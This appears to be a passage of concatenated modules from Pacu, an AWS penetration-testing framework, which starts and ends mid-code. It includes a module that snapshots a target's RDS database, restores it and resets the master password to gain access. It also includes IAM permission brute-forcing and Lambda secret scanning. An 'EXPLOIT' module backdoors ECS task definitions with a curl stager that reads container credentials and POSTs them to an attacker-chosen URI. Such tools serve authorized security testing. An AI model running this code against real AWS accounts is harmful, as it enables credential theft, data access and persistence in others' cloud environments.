        regions = pacu.get_regions('rds')
    if not cleanup(pacu):
        if pacu.input('  Cleanup Failed. Continue? (y/n) ') != 'y':
            return {'fail': 'Failed to delete temporary data.'}
    summary_data = {'instances': 0}
    for region in regions:
        pacu.print('Region: {}'.format(region))
        client = pacu.get_boto3_client('rds', region)
        pacu.print('  Getting RDS instances...')
        active_instances = get_all_region_instances(client, pacu.print)
        pacu.print('  Found {} RDS instance(s)'.format(len(active_instances)))
        for instance in active_instances:
            prompt = '    Target: {} (y/n)? '.format(instance['DBInstanceIdentifier'])
            if pacu.input(prompt).lower() != 'y':
                continue
            pacu.print('    Creating temporary snapshot...')
            temp_snapshot = create_snapshot_from_instance(client, instance, pacu.print)
            if not temp_snapshot:
                pacu.print('    Failed to create temporary snapshot')
                continue

            pacu.print('    Restoring temporary instance from snapshot...')
            temp_instance = restore_instance_from_snapshot(client, temp_snapshot, pacu.print)
            if not temp_instance:
                pacu.print('    Failed to create temporary instance')
                delete_snapshot(client, temp_snapshot, pacu.print)
                continue

            process_instance(pacu, client, temp_instance)

            pacu.print('    Deleting temporary resources...')
            delete_instance(client, temp_instance, pacu.print)
            delete_snapshot(client, temp_snapshot, pacu.print)
            summary_data['instances'] += 1
    if not cleanup(pacu):
        summary_data['fail'] = 'Failed to delete temporary data.'
    return summary_data


def process_instance(pacu, client, instance):
    waiter = client.get_waiter('db_instance_available')
    waiter.wait(
        DBInstanceIdentifier=instance['DBInstanceIdentifier'],
        WaiterConfig=WAIT_CONFIG,
    )
    password = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(20))
    pacu.print('    Master Password for current instance: {}'.format(password))
    if modify_master_password(client, instance, password, pacu.print):
        pacu.print('      Password Change Successful')
    else:
        pacu.print('      Password Change Failed')

    response = client.describe_db_instances(
        DBInstanceIdentifier=instance['DBInstanceIdentifier']
    )
    endpoint = response['DBInstances'][0]['Endpoint']
    pacu.print('    Connection Information:')
    pacu.print('      Address: {}'.format(endpoint['Address']))
    pacu.print('      Port: {}'.format(endpoint['Port']))

    pacu.input('    Press enter to process next instance...')


def modify_master_password(client, instance, password, print):
    try:
        client.modify_db_instance(
            DBInstanceIdentifier=instance['DBInstanceIdentifier'],
            MasterUserPassword=password,
        )
        return True
    except ClientError as error:
        print('      ' + error.response['Error']['Code'])
    return False


def restore_instance_from_snapshot(client, snapshot, print):
    waiter = client.get_waiter('db_snapshot_available')
    waiter.wait(
        DBSnapshotIdentifier=snapshot['DBSnapshotIdentifier'],
        WaiterConfig=WAIT_CONFIG,
    )
    try:
        response = client.restore_db_instance_from_db_snapshot(
            DBInstanceIdentifier=snapshot['DBSnapshotIdentifier'],
            DBSnapshotIdentifier=snapshot['DBSnapshotIdentifier'],
        )
        mark_temp(response['DBInstance'])
        return response['DBInstance']
    except ClientError as error:
        print('      ' + error.response['Error']['Code'])
    return {}


def delete_snapshot(client, snapshot, print):
    waiter = client.get_waiter('db_snapshot_available')
    waiter.wait(
        DBSnapshotIdentifier=snapshot['DBSnapshotIdentifier'],
        WaiterConfig=WAIT_CONFIG,
    )
    try:
        response = client.delete_db_snapshot(
            DBSnapshotIdentifier=snapshot['DBSnapshotIdentifier']
        )
        remove_temp(response['DBSnapshot'])
        return True
    except ClientError as error:
        print('      ' + error.response['Error']['Code'])
    return False


def delete_instance(client, instance, print):
    waiter = client.get_waiter('db_instance_available')
    waiter.wait(
        DBInstanceIdentifier=instance['DBInstanceIdentifier'],
        WaiterConfig=WAIT_CONFIG,
    )
    try:
        response = client.delete_db_instance(
            DBInstanceIdentifier=instance['DBInstanceIdentifier'],
            SkipFinalSnapshot=True,
        )
        remove_temp(response['DBInstance'])
    except ClientError as error:
        print('      ' + error.response['Error']['Code'])
        return False
    waiter = client.get_waiter('db_instance_deleted')
    waiter.wait(
        DBInstanceIdentifier=instance['DBInstanceIdentifier'],
        WaiterConfig=WAIT_CONFIG,
    )
    return True


def create_snapshot_from_instance(client, instance, print):
    waiter = client.get_waiter('db_instance_available')
    waiter.wait(
        DBInstanceIdentifier=instance['DBInstanceIdentifier'],
        WaiterConfig=WAIT_CONFIG,
    )
    try:
        response = client.create_db_snapshot(
            DBSnapshotIdentifier=instance['DBInstanceIdentifier'] + '-copy',
            DBInstanceIdentifier=instance['DBInstanceIdentifier'],
        )
        mark_temp(response['DBSnapshot'])
        return response['DBSnapshot']
    except ClientError as error:
        print('      ' + error.response['Error']['Code'])
    return {}


def get_all_region_instances(client, print):
    out = []
    paginator = client.get_paginator('describe_db_instances')
    pages = paginator.paginate()
    try:
        for page in pages:
            out.extend(page['DBInstances'])
        return out
    except ClientError as error:
        print('    ' + error.response['Error']['Code'])
        return []


def summary(data, pacu_main):
    if 'fail' in data:
        out = data['fail'] + '\n'
    else:
        out = '  No issues cleaning up temporary data\n'
    out += '  {} Copy Instance(s) Launched'.format(data['instances'])
    return out



#!/usr/bin/env python3
import argparse
from datetime import datetime
import json
import os
import re

import boto3

from . import param_generator

module_info = {
    'name': 'iam__bruteforce_permissions',
    'author': 'Alexander Morgenstern at RhinoSecurityLabs',
    'category': 'ENUM',
    'one_liner': 'Enumerates permissions using brute force',
    'description': "This module will automatically run through all possible API calls of supported services in order to enumerate permissions without the use of the IAM API.",
    'services': ['all'],
    'prerequisite_modules': [],
    'external_dependencies': [],
    'arguments_to_autocomplete': ['--services'],
}


parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])
parser.add_argument(
    '--services',
    required=False,
    default=None,
    help='A comma separated list of services to brute force permissions'
)

SUPPORTED_SERVICES = [
    'ec2',
    's3',
    'logs'
]

client = None
current_region = None
current_service = None

summary_data = {
    'unsupported': [],
    'unknown': [],
    'services': [],
    'allow': [],
    'deny': [],
}


def complete_service_list():
    """Returns a list of all supported boto3 services"""
    session = boto3.session.Session()
    return session.get_available_services()


def missing_param(param):
    """Sets param to 'dummydata'"""
    # Don't use an underscore here (or change this in general) since it can result in different and possibly
    # incorrect error codes
    out = {param: 'dummydata'}
    return out


def invalid_param(valid_type):
    """Returns an object matching the requested valid type."""
    print('Checking for invalid types')
    types = {
        'datetime.datetime': datetime(2015, 1, 1),
        'list': ['test'],
        'int': 1,
        'dict': {},
        'bool': True
    }
    return types[valid_type]


def error_delegator(error):
    """Processes the complete error message. Trims the error response to not overwrite missing data with a valid type error"""
    kwargs = {}
    # Ignore first line of error message and process in reverse order.
    for line in str(error).split('\n')[::-1][:-1]:
        if 'Missing required parameter in input' in line:
            if line[line.find('"') + 1:-1] not in kwargs.keys():
                kwargs = {**kwargs, **missing_param(line.split()[-1][1:-1])}
        elif 'Missing required parameter in' in line:
            # Grabs the parameter to build a dictionary of
            dict_name = line.split(':')[0].split()[-1]
            if '[' in dict_name:
                # Need to populate missing parameters for a sub type
                param = dict_name[:dict_name.find('.')]
                sub_param = dict_name[dict_name.find('.') + 1:dict_name.find('[')]
                missing_parameter = line[line.find('"') + 1:-1]
                kwargs.update({param: {sub_param: [missing_param(missing_parameter)]}})
            else:
                param = line.split(':')[1].strip()[1:-1]
                if dict_name not in kwargs:
                    kwargs = {dict_name: {param: ''}}
                else:
                    kwargs[dict_name].update({param: ''})

        elif 'Invalid type for parameter' in line:
            param_name = line.split()[4][:-1]
            if '.' in param_name:
                # This invalid type is a sub type within a parameter
                dict_name = param_name.split('.')[0]
                param_name = param_name.split('.')[1]
                if '[' in param_name:
                    # The invalid parameter is a list within a dict within a dict
                    param_name = param_name[:param_name.find('[')]
                    valid_type = line.split("'")[3]
                    temp_dict = {param_name: [invalid_param(valid_type)]}
                else:
                    # The invalid parameter is a basic key value
                    valid_type = line.split("'")[-2]
                    temp_dict = {param_name: invalid_param(valid_type)}
                if dict_name not in kwargs:
                    kwargs.update({dict_name: temp_dict})
                else:
                    kwargs[dict_name].update(temp_dict)
            else:
                # Convert list of strings to list of dicts of invalid list subtype found.
                if param_name[:-3] == '[0]':
                    kwargs[param_name] = [{'DryRun': True}]
                else:
                    valid_type = line.split("'")[3]
                    kwargs[param_name] = invalid_param(valid_type)
    return kwargs


def generate_preload_actions():
    """Certain actions require parameters that cannot be easily discerned from the
    error message provided by preloading kwargs for those actions.
    """
    module_dir = os.path.dirname(__file__)
    path = os.path.join(module_dir, 'preload_actions.json')
    with open(path) as actions_file:
        data = actions_file.read()
    return json.loads(data)


def read_only_function(service, func):
    """Verifies that actions being ran are ReadOnlyAccess to minimize unexpected
    changes to the AWS environment.
    """
    module_dir = os.path.dirname(__file__)
    path = os.path.join(module_dir, 'ReadOnlyAccessPolicy.json')
    with open(path) as file:
        data = json.load(file)
        formatted_func = service + ':' + camel_case(func)
        for action in data['Statement'][0]['Action']:
            if re.match(action, formatted_func) is not None:
                return True
    return False


def valid_func(service, func):
    """Returns False for service functions that don't correspond to an AWS API action"""
    if func[0] == '_':
        return False
    BAD_FUNCTIONS = [
        # Common boto3 methods.
        'can_paginate',
        'get_waiter',
        'waiter_names',
        'get_paginator',
        'generate_presigned_url',
        'generate_presigned_post',
        'exceptions',
        'meta',

        # S3 Function to manage multipart uploads.
        'list_parts',
    ]
    if func in BAD_FUNCTIONS:
        return False
    return read_only_function(service, func)


def convert_special_params(func, kwargs):
    """Certain actions go through additional argument parsing. If such a case exists, the dummy_data will
    be filled with valid data so that the action can successfully pass validation and reach and query
    correctly determine authorization.
    """
    SPECIAL_PARAMS = [
        'Bucket',
        'Attribute',
        'Key',
    ]
    for param in list(filter(lambda p: kwargs[p] == 'dummydata', kwargs)):
        if param in SPECIAL_PARAMS:
            v = param_generator.get_special_param(client, func, param)
            if v is None:
                return False
            else:
                kwargs[param] = v
                return True
    return False


def build_service_list(services=None):
    """Returns a list of valid services. """
    if not services:
        return SUPPORTED_SERVICES

    unsupported_services = [s for s in services if s not in SUPPORTED_SERVICES]
    summary_data['unsupported'] = unsupported_services

    unknown_services = [service for service in unsupported_services if service not in complete_service_list()]
    summary_data['unknown'] = unknown_services
    service_list = [service for service in services if service in SUPPORTED_SERVICES]
    return service_list


def error_permissions(error):
    """There are certain Exceptions raised that indicate successful authorization. This method will return 'allowed',
    'unknown', or 'denied' based on the whether the error indicates access is allowed or not.
    """
    VALID_EXCEPTIONS = [
        'DryRunOperation',
        # S3
        'NoSuchCORSConfiguration',
        'ServerSideEncryptionConfigurationNotFoundError',
        'NoSuchConfiguration',
        'NoSuchLifecycleConfiguration',
        'ReplicationConfigurationNotFoundError',
        'NoSuchTagSet',
        'NoSuchWebsiteConfiguration',
        'NoSuchKey',
        'NoSuchBucket',
        'NoSuchBucketPolicy',
        'OwnershipControlsNotFoundError',
        'MethodNotAllowed',
        '(403) when calling the HeadBucket operation',
        '(404) when calling the HeadObject operation',
        '(InvalidRequest) when calling the GetObjectLegalHold operation',
        '(InvalidRequest) when calling the GetObjectRetention operation',
        '(ObjectLockConfigurationNotFoundError) when calling the GetObjectLockConfiguration operation',
        '(NoSuchPublicAccessBlockConfiguration) when calling the GetPublicAccessBlock operation',

        # EC2
        'InvalidTargetArn.Unknown',
        'Invalid type for parameter ReservedInstanceIds',
        'Invalid type for parameter HostIdSet',
        '(InvalidCertificateArn.Malformed) when calling the GetAssociatedEnclaveCertificateIamRoles operation',
        '(InvalidInstanceID.Malformed) when calling the GetConsoleScreenshot',
        '(InvalidParameterValue) when calling the GetFlowLogsIntegrationTemplate operation',


        # Logs
        '(ResourceNotFoundException) when calling the DescribeLogStreams operation',
        '(ResourceNotFoundException) when calling the DescribeSubscriptionFilters operation',
        '(ResourceNotFoundException) when calling the FilterLogEvents operation',
        '(ResourceNotFoundException) when calling the GetLogEvents operation',
        '(InvalidParameterException) when calling the GetLogRecord operation',
        '(ResourceNotFoundException) when calling the GetQueryResults operation',
        '(ResourceNotFoundException) when calling the ListTagsLogGroup operation',
    ]

    UNKNOWN_EXCEPTIONS = [
        # EC2
        '(InvalidAction) when calling the DescribeAddressesAttribute operation'
        '(InvalidHostId.Malformed) when calling the GetHostReservationPurchasePreview operation:'
    ]

    for exception in VALID_EXCEPTIONS:
        if exception in str(error):
            return 'allowed'

    for exception in UNKNOWN_EXCEPTIONS:
        if exception in str(error):
            return 'unknown'

    return 'denied'


def main(args, pacu_main):
    session = pacu_main.get_active_session()
    args = parser.parse_args(args)
    print = pacu_main.print

    service_list = build_service_list(args.services.lower().split(',')) if args.services else build_service_list()
    if not service_list:
        return summary_data
    summary_data['services'] = service_list

    preload_actions = generate_preload_actions()

    allow_permissions = {}
    unknown_permissions = {}
    deny_permissions = {}

    for service in service_list:
        global current_service
        current_service = service
        allow_permissions[service] = []
        unknown_permissions[service] = []
        deny_permissions[service] = []

        # Only checking against 'us-east-1'. To store more granular permissions the DB needs to be changed.
        regions = ['us-east-1']
        for region in regions:
            global current_region, client

            current_region = region
            client = pacu_main.get_boto3_client(service, region)

            functions = [func for func in dir(client) if valid_func(service, func)]
            index = 1

            for func in functions:
                index += 1

                op = client.meta.service_model.operation_model(operation_name=client._PY_TO_OP_NAME[func])

                if func in preload_actions:
                    kwargs = preload_actions[func] if func in preload_actions else {}
                else:
                    kwargs = dict(((arg, 'dummydata') for arg in getattr(op.input_shape, 'required_members', [])))

                    members = getattr(op.input_shape, 'members', {})
                    if members.get('DryRun'):
                        kwargs['DryRun'] = True

                    if members.get('AvailabilityZone'):
                        kwargs['AvailabilityZone'] = current_region

                    if members.get('MaxResults'):
                        kwargs['MaxResults'] = 10

                    if members.get('GroupId'):
                        kwargs['GroupId'] = 1

                if members.get('StartTime'):
                    kwargs['StartTime'] = datetime.now()

                convert_special_params(func, kwargs)

                print('Trying {} -- kwargs: {}'.format(func, kwargs))
                caller = getattr(client, func)
                try:
                    caller(**kwargs)
                    allow_permissions[service].append(func)
                    print('    Authorization exists for: {}'.format(func))
                    continue
                except Exception as error:
                    if error_permissions(error) == 'allowed':
                        allow_permissions[service].append(func)
                        print('    Authorization exists for: {}'.format(func))
                        continue
                    elif error_permissions(error) == 'unknown':
                        unknown_permissions[service].append(func)
                        continue
                    print(error)
                    deny_permissions[service].append(func)

    print('Allowed Permissions: \n')
    print_permissions(allow_permissions)
    print('Denied Permissions: \n')
    print_permissions(deny_permissions)

    # Condenses the following dicts to a list that fits the standard service:action format.
    if allow_permissions:
        full_allow = [service + ':' + camel_case(perm) for perm in allow_permissions[service] for service in allow_permissions]
    if deny_permissions:
        full_deny = [service + ':' + camel_case(perm) for perm in deny_permissions[service] for service in deny_permissions]

    active_aws_key = session.get_active_aws_key(pacu_main.database)
    active_aws_key.update(
        pacu_main.database,
        allow_permissions=full_allow,
        deny_permissions=full_deny
    )

    summary_data['allow'] = sum([len(allow_permissions[region]) for region in allow_permissions])
    summary_data['unknown'] = sum([len(allow_permissions[region]) for region in unknown_permissions])
    summary_data['deny'] = sum([len(deny_permissions[region]) for region in deny_permissions])

    return summary_data


def print_permissions(permission_dict):
    """Helper function to print permissions."""
    for service in permission_dict:
        print('  {}:'.format(service))
        for action in permission_dict[service]:
            print('    {}'.format(action))
        print('')


def camel_case(name):
    """Helper function to convert snake_case to CamelCase."""
    split_name = name.split('_')
    return ''.join([name[0].upper() + name[1:] for name in split_name])


def summary(data, pacu_main):
    out = 'Services: \n'
    out += '  Supported: {}.\n'.format(data['services'])
    if 'unsupported' in data:
        out += '  Unsupported: {}.\n'.format(data['unsupported'])
    if 'unknown' in data:
        out += '  Unknown: {}.\n'.format(data['unknown'])
    out += '{} allow permissions found.\n'.format(data['allow'])
    out += '{} unknown permissions found.\n'.format(data['unknown'])
    out += '{} deny permissions found.\n'.format(data['deny'])
    return out



#!/usr/bin/env python3
import argparse
import requests
import zipfile
import os
import re

from pacu.core.lib import downloads_dir
from pacu.core.secretfinder.utils import regex_checker, contains_secret, Color
from botocore.exceptions import ClientError


module_info = {
    # Name of the module (should be the same as the filename)
    'name': 'lambda__enum',

    # Name and any other notes about the author
    'author': 'Alexander Morgenstern alexander.morgenstern@rhinosecuritylabs.com',

    # Category of the module. Make sure the name matches an existing category.
    'category': 'ENUM',

    # One liner description of the module functionality. This shows up when a user searches for modules.
    'one_liner': 'Enumerates data from AWS Lambda.',

    # Full description about what the module does and how it works
    'description': 'This module pulls data related to Lambda Functions, source code, aliases, event source mappings, versions, tags, and policies.',

    # A list of AWS services that the module utilizes during its execution
    'services': ['Lambda'],

    # For prerequisite modules, try and see if any existing modules return the data that is required for your module before writing that code yourself, that way, session data can stay separated and modular.
    'prerequisite_modules': [],

    # External resources that the module depends on. Valid options are either a GitHub URL (must end in .git) or single file URL.
    'external_dependencies': [],

    # Module arguments to autocomplete when the user hits tab
    'arguments_to_autocomplete': ['--versions-all', '--regions', '--checksource'],
}

parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])
parser.add_argument('--versions-all', required=False, default=False, action='store_true', help='Grab all versions instead of just the latest')
parser.add_argument('--regions', required=False, default=None, help='One or more (comma separated) AWS regions in the format us-east-1. Defaults to all session regions.')
parser.add_argument('--checksource', required=False, default=False, action='store_true', help='Download and scan all lambda functions for secrets. Warning this could effect performance.' )

SOURCE_ENTROPY_THRESHOLD = 3.8

def fetch_lambda_data(client, func, key, print, **kwargs):
    caller = getattr(client, func)
    try:
        response = caller(**kwargs)
        data = response[key]
        if isinstance(data, (dict, str)):
            return data
        while 'nextMarker' in response:
            response = caller({**kwargs, **{'NextMarker': response['nextMarker']}})
            data.extend(response[key])
        return data
    except client.exceptions.ResourceNotFoundException:
        pass
    except ClientError as error:
        print('  FAILURE:')
        code = error.response['Error']['Code']
        if code == 'AccessDeniedException':
            print('    MISSING NEEDED PERMISSIONS')
        else:
            print(code)
    return []


def main(args, pacu_main):
    session = pacu_main.get_active_session()

    ###### Don't modify these. They can be removed if you are not using the function.
    args = parser.parse_args(args)
    print = pacu_main.print
    get_regions = pacu_main.get_regions
    ######



    if args.regions:
        regions = args.regions.split(',')
    else:
        regions = get_regions('Lambda')

    lambda_data = {}
    summary_data = {}
    lambda_data['Functions'] = []
    for region in regions:
        print('Starting region {}...'.format(region))

        client = pacu_main.get_boto3_client('lambda', region)

        try:
            account_settings = client.get_account_settings()
            # Delete any ResponseMetaData to have cleaner account_settings response
            del account_settings['ResponseMetadata']
            for key in account_settings:
                lambda_data[key] = account_settings[key]
        except ClientError as error:
            if error.response['Error']['Code'] == 'AccessDeniedException':
                print('Access Denied for get-account-settings')
            else:
                print(error)

        lambda_functions = fetch_lambda_data(client, 'list_functions', 'Functions', print)

        for func in lambda_functions:
            print('  Enumerating data for {}'.format(func['FunctionName']))
            func_arn = func['FunctionArn']
            func['Region'] = region
            func['Code'] = fetch_lambda_data(client, 'get_function', 'Code', print, FunctionName=func_arn)
            func['Aliases'] = fetch_lambda_data(client, 'list_aliases', 'Aliases', print, FunctionName=func_arn)
            func['EventSourceMappings'] = fetch_lambda_data(client, 'list_event_source_mappings', 'EventSourceMappings', print, FunctionName=func_arn)
            func['Tags'] = fetch_lambda_data(client, 'list_tags', 'Tags', print, Resource=func_arn)
            func['Policy'] = fetch_lambda_data(client, 'get_policy', 'Policy', print, FunctionName=func_arn)
            if args.versions_all:
                func['Versions'] = fetch_lambda_data(client, 'list_versions_by_function', 'Versions', print, FunctionName=func_arn)

            # Check for secrets in data
            check_evn_secrets(func)
            if args.checksource:
                check_source_secrets(session.name, func)

        lambda_data['Functions'] += lambda_functions
        if lambda_functions:
            summary_data[region] = len(lambda_functions)
    session.update(pacu_main.database, Lambda=lambda_data)

    return summary_data


def summary(data, pacu_main):
    out = ''
    for region in sorted(data):
        out += '  {} functions found in {}. View more information in the DB \n'.format(data[region], region)
    if not out:
        out = '  Nothing was enumerated'
    return out


def check_evn_secrets(function):
    try:
        env_vars = function['Environment']['Variables']
        [Color.print(Color.GREEN, '\t[+] Secret (ENV): {}= {}'.format(key, env_vars[key])) for key in env_vars if contains_secret(env_vars[key])]
    except KeyError:
        return

def check_source_secrets(session_name, function):
    pattern = "(#.*|//.*|\\\".*\\\"|'.*'|/\\*.*|\".*\")"

    source_data = get_function_source(session_name, function)

    for key in source_data:
        for line in re.findall(pattern, source_data[key]):
            secrets = regex_checker(line)
            if secrets:
                [Color.print(Color.GREEN, "\t{}: {}".format(key, secrets[key])) for key in secrets]


def get_function_source(session_name, func):
    try:
        # Get Link and setup file name
        fname = func['FunctionArn'].split(':')
        fname = fname[len(fname)-1]

        code_url = func['Code']['Location']

        # Download File from URL
        r = requests.get(code_url, stream=True)

        # Write Zip to output file
        fname = str(downloads_dir()/f'lambda_{fname}.zip')
        with open(fname, 'wb') as f:
            f.write(r.content)

        # Load Zip contents into memory
        lambda_zip = zipfile.ZipFile(fname)

        return {id: lambda_zip.read(name).decode("utf-8", errors='ignore') for name in lambda_zip.namelist()}

    except KeyError:
        print(Color.RED, 'Error getting {fname} Source'.format(fname))




#!/usr/bin/env python3
import argparse
from botocore.exceptions import ClientError
from random import choice
import os

# When writing a module, feel free to remove any comments, placeholders, or
# anything else that doesn't relate to your module.

module_info = {
    # Name of the module (should be the same as the filename).
    'name': 'ecs__backdoor_task_def',

    # Name and any other notes about the author.
    'author': 'Nicholas Spagnola from Rhino Security Labs',

    # Category of the module. Make sure the name matches an existing category.
    'category': 'EXPLOIT',

    # One liner description of the module functionality. This shows up when a
    # user searches for modules.
    'one_liner': 'this module backdoors ECS Task Definitions to steal credentials',

    # Full description about what the module does and how it works.
    'description': 'This module will enumerate a provided docker image and attempt to find a method to deliver a malicious shell script to the container.',

    # A list of AWS services that the module utilizes during its execution.
    'services': ['ECS'],

    # For prerequisite modules, try and see if any existing modules return the
    # data that is required for your module before writing that code yourself;
    # that way, session data can stay separated and modular.
    'prerequisite_modules': ['ecs__enum', 'ec2__enum'],

    # External resources that the module depends on. Valid options are either
    # a GitHub URL (must end in .git), or a single file URL.
    'external_dependencies': [],

    # Module arguments to autocomplete when the user hits tab.
    'arguments_to_autocomplete': ['--task-definition',
								  '--cluster',
								  '--uri',
								  '--execution-role',
								  '--subnet',
								  '--security-group']
}

# Every module must include an ArgumentParser named "parser", even if it
# doesn't use any additional arguments.
parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])

# The two add_argument calls are placeholders for arguments. Change as needed.
# Arguments that accept multiple options, such as --usernames, should be
# comma-separated. For example:
#     --usernames user_a,userb,UserC
# Arguments that are region-specific, such as --instance-ids, should use
# an @ symbol to separate the data and its region; for example:
#     --instance-ids 123@us-west-1,54252@us-east-1,9999@ap-south-1
# Make sure to add all arguments to module_info['arguments_to_autocomplete']
parser.add_argument('--task-definition', required=False, default=None, help='A task definition ARN')
parser.add_argument('--cluster', required=False, default=None, help='Cluster ARN to host task')
parser.add_argument('--uri', required=False, default=None, help='URI to send credentials to via POST')
parser.add_argument('--task-role', required=False, default=None,
                    help='ARN of task role, defaults to what is provided in the task definition')
parser.add_argument('--subnet', required=False, default=None,
                    help='Subnet ID to host task. Subnet and security group must be in same VPC')
parser.add_argument('--security-group', required=False, default=None,
                    help='Security group Id to host task. Subnet and security group must be in same VPC')

def ask_for_task_role(default=None):
    task_role = input(f"Enter a task role to target ({str(default)})")

    if not task_role and not default:
        print("An explicit task role is required.")
        return ask_for_task_role()

    return task_role


# Main is the first function that is called when this module is executed.
def main(args, pacu_main):
    session = pacu_main.get_active_session()

    ###### These can be removed if you are not using the function.
    args = parser.parse_args(args)
    print = pacu_main.print
    input = pacu_main.input
    fetch_data = pacu_main.fetch_data

    summary_data = {"task_def": ""}

    if args.task_definition:
        task_definition = args.task_definition
    else:
        if fetch_data(['ECS', 'TaskDefinitions'], module_info['prerequisite_modules'][0], '--taskdef') is False:
            print("    Pre req module not ran successfully. Exiting...")
            return None
        task_definitions = session.ECS.get('TaskDefinitions', [])
        for i in range(0, len(task_definitions)):
            print("    [{}]:{}".format(i, task_definitions[i]))
        task_def_input = int(input('    Enter the task definition ARN you are targeting: '))
        task_definition = task_definitions[task_def_input]

    if task_definition:
        region = task_definition.split(":")[3]

        if fetch_data(['ECS', 'Clusters'], module_info['prerequisite_modules'][0], '--clusters') is False:
            print("    Pre req module not ran successfully. Exiting...")
            return None

        if not args.cluster:
            clusters = session.ECS['Clusters']
            for i in range(0, len(clusters)):
                print("    [{}]:{}".format(i, clusters[i]))
            cluster_input = int(input("    Provide a cluster to run this task definition: "))
            cluster = clusters[cluster_input]
        else:
            cluster = args.cluster

        client = pacu_main.get_boto3_client('ecs', region)
        task_def = client.describe_task_definition(
            taskDefinition=task_definition
        )

        if args.uri:
            uri = args.uri
        else:
            uri = input("    Enter a URI to host payload/receive credentials: ")


        stager = [
            '/bin/sh -c "curl http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI > data.json && curl -X POST '
            '-d @data.json {}"'.format(uri)
        ]
        task_def_keys = [x for x in task_def['taskDefinition'].keys()]
        temp = task_def['taskDefinition']
        cont_def = temp['containerDefinitions'][0]
        cont_def['image'] = 'python:latest'
        cont_def['entryPoint'] = ['sh', '-c']
        cont_def['command'] = stager
        container_defs = [cont_def]

        task_role = ask_for_task_role(temp.get('taskRoleArn'))

        print("    Creating malicious task definition...")

        resp = client.register_task_definition(
            family=temp['family'],
            taskRoleArn=task_role,
            executionRoleArn=temp['executionRoleArn'] if 'executionRoleArn' in task_def_keys else '',
            networkMode='awsvpc',
            containerDefinitions=container_defs,
            volumes=temp['volumes'],
            placementConstraints=temp['placementConstraints'],
            requiresCompatibilities=temp['requiresCompatibilities'] if 'requiresCompatibilities' in task_def_keys else [],
            cpu=temp['cpu'] if 'cpu' in task_def_keys else '256',
            memory=temp['memory'] if 'memory' in task_def_keys else '512'
        )

        current_revision = resp['taskDefinition']['taskDefinitionArn']

        if args.subnet is None:
            if fetch_data(['EC2', 'Subnets'], module_info['prerequisite_modules'][1], '--subnets') is False:
                print("    Pre req module not ran successfully. Exiting...")
                return None
            subnets = session.EC2["Subnets"]
            for i in range(0, len(subnets)):
                print("    [{}]:{}::{}".format(i, subnets[i]["SubnetId"], subnets[i]["VpcId"]))
            subnet_choice = int(input("    Input subnet ID to run the task definition: "))
            subnet = subnets[subnet_choice]["SubnetId"]
        else:
            subnet = args.subnet

        if args.security_group is None:
            if fetch_data(['EC2', 'SecurityGroups'], module_info['prerequisite_modules'][1], '--security-groups') is False:
                print("    Pre req module not ran successfully. Exiting...")
                return None
            security_groups = session.EC2["SecurityGroups"]
            for i in range(0, len(security_groups)):
                print("    [{}]:{}::{}".format(i, security_groups[i]["GroupId"], security_groups[i]["VpcId"]))
            sg_choice = int(input("    Input the secuirty group to use: "))
            security_group = security_groups[sg_choice]["GroupId"]
        else:
            security_group = args.security_group

        client.run_task(cluster=cluster, launchType="FARGATE", networkConfiguration={
            "awsvpcConfiguration": {
                "subnets": [subnet],
                "securityGroups": [security_group],
                "assignPublicIp": "ENABLED"
            }}, taskDefinition=current_revision)

    else:
        print("    A task definition must be specified")
        return None

    summary_data["task_def"] = current_revision
    return summary_data


def summary(data, pacu_main):
    return "    Malicious task definition ARN: {}".format(data["task_def"])



from botocore.exceptions import ClientError

# Stores found values to minimize AWS calls
PARAM_CACHE = {}

current_region = None


def get_special_param(client, func, param):
    print('Getting info for func: {}, param: {}'.format(func, param))
    if param in PARAM_CACHE:
        return PARAM_CACHE[param]

    if param == 'Bucket':
        PARAM_CACHE[param] = get_bucket(client)
    elif param == 'Attribute':
        # Return 'Attribute directly because it doesn't need to reach out to AWS
        return get_attribute(func)
    elif param == 'Key':
        PARAM_CACHE[param] = get_key(client)
    return PARAM_CACHE[param]


def get_key(client, i=0):
    try:
        bucket = client.list_buckets()['Buckets'][i]['Name']
        try:
            key = client.list_objects_v2(
                Bucket=bucket,
                MaxKeys=1
            ).get('Contents', [{}])[0].get('Key')
            return key
        except KeyError:
            get_key(client, i+1)  # If this bucket is empty try the next one
    except ClientError as error:
        if error.response['Error']['Code'] == 'AccessDeniedException':
            return None
    return None


def get_bucket(client):
    try:
        return client.list_buckets()['Buckets'][0]['Name']
    except ClientError as error:
        if error.response['Error']['Code'] == 'AccessDeniedException':
            return None
    return None


def get_attribute(func):
    FUNC_ATTRIBUTES = {
        'reset_image_attribute': 'launchPermission',
        'reset_instance_attribute': 'kernel',
        'reset_snapshot_attribute': 'createVolumePermission',
        'describe_instance_attribute': 'instanceType',
        'describe_image_attribute': 'description',
        'describe_snapshot_attribute': 'productCodes',
        'describe_vpc_attribute': 'enableDnsSupport',
    }
    return FUNC_ATTRIBUTES.get(func, None)



#!/usr/bin/env python3
import argparse
from botocore.exceptions import ClientError
import json

module_info = {
    # Name of the module (should be the same as the filename).
    'name': 'route53__enum',

    # Name and any other notes about the author.
    'author': 'Aaron Rea - Scalesec',

    # Category of the module. Make sure the name matches an existing category.
    'category': 'ENUM',

    # One liner description of the module functionality. This shows up when a
    # user searches for modules.
    'one_liner': 'Enumerates Route53 hosted zones and query loggin congiurations',

    # Full description about what the module does and how it works.
    'description': 'This module enumerates Route53 hosted zones accross an account and correlates them with query logging configs for later use.',

    # A list of AWS services that the module utilizes during its execution.
    'services': ['Route53'],

    # For prerequisite modules, try and see if any existing modules return the
    # data that is required for your module before writing that code yourself;
    # that way, session data can stay separated and modular.
    'prerequisite_modules': [],

    # External resources that the module depends on. Valid options are either
    # a GitHub URL (must end in .git), or a single file URL.
    'external_dependencies': [],

    # Module arguments to autocomplete when the user hits tab.
    'arguments_to_autocomplete': ['--get_query_logging_config'],
}


parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])


def get_hosted_zones(client):
    hosted_zones = client.list_hosted_zones()['HostedZones']

    zones = {}

    if len(hosted_zones) > 0:
        for zone in hosted_zones:
            zid = zone['Id'].split('/')[2]
            print(f"ZoneID: {zid}  Name: {zone['Name']} Private: {zone['Config']['PrivateZone']} ")
            zones[zid] = zone
    else:
        print("No HostedZones found")

    return zones


def get_query_logging_config(client):
    configs = client.list_query_logging_configs()['QueryLoggingConfigs']

